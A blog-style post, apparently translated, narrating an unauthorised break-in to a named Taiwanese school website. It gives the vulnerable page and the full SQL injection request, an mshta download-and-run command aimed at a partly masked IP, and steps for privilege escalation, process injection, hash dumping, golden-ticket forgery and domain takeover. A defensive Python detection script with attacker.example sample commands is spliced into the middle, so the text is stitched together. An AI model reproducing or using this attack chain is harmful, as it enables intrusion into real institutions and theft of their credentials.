Bored at home, so I found a Taiwanese site to practice on

Reconnaissance

Target site: www.wgps.tp.edu.tw

Weak point: http://www.wgps.tp.edu.tw/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp

SQL injection POST request:

POST /PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp HTTP/1.1
Host: www.wgps.tp.edu.tw
Content-Length: 31
Cache-Control: max-age=0
Origin: http://www.wgps.tp.edu.tw
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.wgps.tp.edu.tw/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASPSESSIONIDQCABSDCS=DBGDAIKBDEHOPFOFPEAPPLBB
Connection: close

txtSchoolYear=108B&txtStdID=1234

Privileges: DBA (sa)

Internal lateral movement

Set up an HTTPS listener in CS and generate an HTML Application file

Then upload it to the CS server

From the sqlmap os-shell, run mshta http://207.*.*.201:80/download/file.txt
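The os-shell to mshta step above is exactly the process chain a defender can alert on: a database engine should never spawn a shell, and a shell under it should never launch a script host that fetches a remote URL. The following is an added example, not code from this post or from any tool it mentions: a small Python checker over constructed process-creation events (Sysmon event 1 / Security 4688 style; the PIDs, paths and the attacker.example host are assumptions) that flags interpreters or script hosts with sqlservr.exe as an ancestor and calls out mshta launched with a remote URL.

```python
import os
import re
from dataclasses import dataclass
DB_ENGINES = {"sqlservr.exe"}  # parents that should never spawn a shell or script host
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

@dataclass(frozen=True)
class ProcEvent:          # one process-creation record (Sysmon event 1 / Security 4688 style)
    pid: int
    ppid: int
    image: str            # full image path as logged
    cmdline: str

def basename(image: str) -> str:
    return os.path.basename(image.replace("\\", "/")).lower()

def ancestry(event: ProcEvent, by_pid: dict) -> list:
    """Walk parent links as far as the log allows; returns image basenames, oldest first."""
    chain, cur, seen = [], event, set()
    while cur is not None and cur.pid not in seen:   # seen-set guards against PID reuse loops
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return list(reversed(chain))

def find_db_spawned_lolbins(events: list) -> list:
    """Return (pid, chain, reason) for every suspicious child that has a DB engine as an ancestor."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        name = basename(e.image)
        if name not in SUSPICIOUS_CHILDREN:
            continue
        chain = ancestry(e, by_pid)
        if not DB_ENGINES & set(chain):
            continue
        reason = "DB engine spawned an interpreter or script host"
        if name == "mshta.exe" and REMOTE_URL.search(e.cmdline):
            reason = "DB engine chain launched mshta with a remote URL (download cradle)"
        hits.append((e.pid, chain, reason))
    return hits

# Constructed sample events: PIDs, paths and the attacker.example host are made up for this example.
SAMPLE_EVENTS = [
    ProcEvent(1000, 600, r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe", "sqlservr.exe"),
    ProcEvent(1100, 1000, r"C:\Windows\System32\cmd.exe", 'cmd.exe /c "mshta http://attacker.example/file.txt"'),
    ProcEvent(1200, 1100, r"C:\Windows\System32\mshta.exe", "mshta http://attacker.example/file.txt"),
    ProcEvent(2000, 700, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2100, 2000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),  # benign: user shell, no DB ancestor
]
```

Running find_db_spawned_lolbins(SAMPLE_EVENTS) flags the cmd.exe and mshta.exe children of sqlservr.exe and leaves the user's explorer-spawned cmd.exe alone; the same rule also catches xp_cmdshell abuse that never touches mshta.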

After a while a host checked in

After setting the beacon callback interval, check the server's environment

A domain is present

Quite a lot of patches are installed

Copy the information to https://bugs.hacking8.com/tiquan/ to check whether any patches are missing

Found MS16-075 unpatched

Found the cna plugin for this exp on GitHub: https://github.com/vysecurity/reflectivepotato.git

Clone it and load it into CS

Obtained a beacon with SYSTEM privileges

Note that the current process's parent is mssql; you need to inject into a process belonging to another user, otherwise some commands will fail with insufficient privileges

Chose to inject into a process of the WEGO user

Check the domain controllers

Based on the descriptions, AD1 is judged to be the primary DC, and AD2 and AD3 secondary DCs

Dump the hashes and keep them for later

Taking over the domain controllers

Use the dumped hashes to forge a golden ticket

Then take over AD1

Then dump hashes from AD1 as well

Got the domain admin's cleartext password on AD1

Then went all in across the board

Took the ops machine
